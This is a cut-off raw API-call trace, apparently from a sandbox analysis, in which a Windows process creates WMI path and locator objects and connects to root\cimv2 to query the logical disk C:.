[0207.468] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0207.468] CoTaskMemFree (pv=0xbed438) [0207.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0207.468] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0207.468] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0207.468] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0207.468] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.469] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x60273e0) returned 0x0 [0207.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x60273e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0207.469] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60273e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6030b70) returned 0x0 [0207.469] WbemDefPath:IUnknown:Release (This=0x60273e0) returned 0x0 [0207.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6030b70) returned 0x0 [0207.469] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0207.470] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0207.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0207.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0207.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ccb08) returned 0x0 [0207.470] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccb08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.470] WbemDefPath:IUnknown:Release (This=0x66ccb08) returned 0x3 [0207.470] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0207.470] CoGetContextToken (in: pToken=0x6d8ddb8 | out: pToken=0x6d8ddb8) returned 0x0 [0207.470] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0207.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0207.470] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0207.470] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x1 [0207.470] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0207.470] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0207.470] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b70, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6030b70) returned 0x0 [0207.470] WbemDefPath:IUnknown:AddRef (This=0x6030b70) returned 0x3 [0207.470] WbemDefPath:IUnknown:Release (This=0x6030b70) returned 0x2 [0207.470] WbemDefPath:IWbemPath:SetText (This=0x6030b70, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.470] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0207.470] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0207.470] WbemDefPath:IWbemPath:GetText (in: This=0x6030b70, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0207.470] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b70, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b70, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0207.471] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.471] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0207.471] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0207.471] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0207.471] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.472] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x60272b0) returned 0x0 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60272b0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0207.472] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60272b0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x60308d0) returned 0x0 [0207.472] WbemDefPath:IUnknown:Release (This=0x60272b0) returned 0x0 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x60308d0) returned 0x0 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0207.472] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0207.472] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66ccd48) returned 0x0 [0207.473] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ccd48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0207.473] WbemDefPath:IUnknown:Release (This=0x66ccd48) returned 0x3 [0207.473] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0207.473] CoGetContextToken (in: pToken=0x6d8dd00 | out: pToken=0x6d8dd00) returned 0x0 [0207.473] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0207.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0207.473] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0207.473] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x1 [0207.473] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0207.473] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0207.473] WbemDefPath:IUnknown:QueryInterface (in: This=0x60308d0, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x60308d0) returned 0x0 [0207.473] WbemDefPath:IUnknown:AddRef (This=0x60308d0) returned 0x3 [0207.473] WbemDefPath:IUnknown:Release (This=0x60308d0) returned 0x2 [0207.473] WbemDefPath:IWbemPath:SetText (This=0x60308d0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0207.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0207.473] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0207.473] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.473] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0207.473] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0207.474] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0207.474] IUnknown:Release (This=0xb51e34) returned 0x1 [0207.474] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x6024d50) returned 0x0 [0207.474] WbemLocator:IUnknown:QueryInterface (in: This=0x6024d50, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0207.475] WbemLocator:IClassFactory:CreateInstance (in: This=0x6024d50, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x60272c0) returned 0x0 [0207.475] WbemLocator:IUnknown:Release (This=0x6024d50) returned 0x0 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x60272c0) returned 0x0 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0207.475] WbemLocator:IUnknown:AddRef (This=0x60272c0) returned 0x3 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0207.475] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0207.475] CoGetContextToken (in: pToken=0x6d8dfe0 | out: pToken=0x6d8dfe0) returned 0x0 [0207.475] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0207.475] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x2 [0207.475] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x1 [0207.475] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0207.475] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0207.475] WbemLocator:IUnknown:QueryInterface (in: This=0x60272c0, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x60272c0) returned 0x0 [0207.476] WbemLocator:IUnknown:AddRef (This=0x60272c0) returned 0x3 [0207.476] WbemLocator:IUnknown:Release (This=0x60272c0) returned 0x2 [0207.476] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60308d0, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0207.476] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0207.476] WbemDefPath:IWbemPath:GetText (in: This=0x60308d0, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0207.476] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x6027270) returned 0x0 [0207.476] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027270, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6d8ebd8 | out: ppNamespace=0x6d8ebd8*=0x60332c4) returned 0x0 [0207.861] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea74 | out: ppvObject=0x6d8ea74*=0xb5a9b4) returned 0x0 [0207.861] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5a9b4, pProxy=0x60332c4, pAuthnSvc=0x6d8eac4, pAuthzSvc=0x6d8eac0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc, pImpLevel=0x6d8eaac, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4 | out: pAuthnSvc=0x6d8eac4*=0xa, pAuthzSvc=0x6d8eac0*=0x0, pServerPrincName=0x6d8eab8, pAuthnLevel=0x6d8eabc*=0x6, pImpLevel=0x6d8eaac*=0x2, pAuthInfo=0x6d8eab0, pCapabilites=0x6d8eab4*=0x1) returned 0x0 [0207.861] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x1 [0207.861] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea68 | out: ppvObject=0x6d8ea68*=0xb5a9d4) returned 0x0 [0207.861] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8ea64 | out: ppvObject=0x6d8ea64*=0xb5a9b4) returned 0x0 [0207.861] WbemLocator:IClientSecurity:SetBlanket (This=0xb5a9b4, pProxy=0x60332c4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0207.862] WbemLocator:IUnknown:Release (This=0xb5a9b4) returned 0x2 [0207.862] WbemLocator:IUnknown:Release (This=0xb5a9d4) returned 0x1 [0207.862] CoTaskMemFree (pv=0xbd4a68) [0207.862] WbemLocator:IUnknown:Release (This=0x6027270) returned 0x0 [0207.862] WbemLocator:IUnknown:QueryInterface (in: This=0x60332c4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e664 | out: ppvObject=0x6d8e664*=0xb5a9d4) returned 0x0 [0207.862] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e620 | out: ppvObject=0x6d8e620*=0x0) returned 0x80004002 [0207.863] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e43c | out: ppvObject=0x6d8e43c*=0x0) returned 0x80004002 [0207.864] WbemLocator:IUnknown:AddRef (This=0xb5a9d4) returned 0x3 [0207.864] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8df7c | out: ppvObject=0x6d8df7c*=0x0) returned 0x80004002 [0207.865] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8df2c | out: ppvObject=0x6d8df2c*=0x0) returned 0x80004002 [0207.865] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a9d4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, 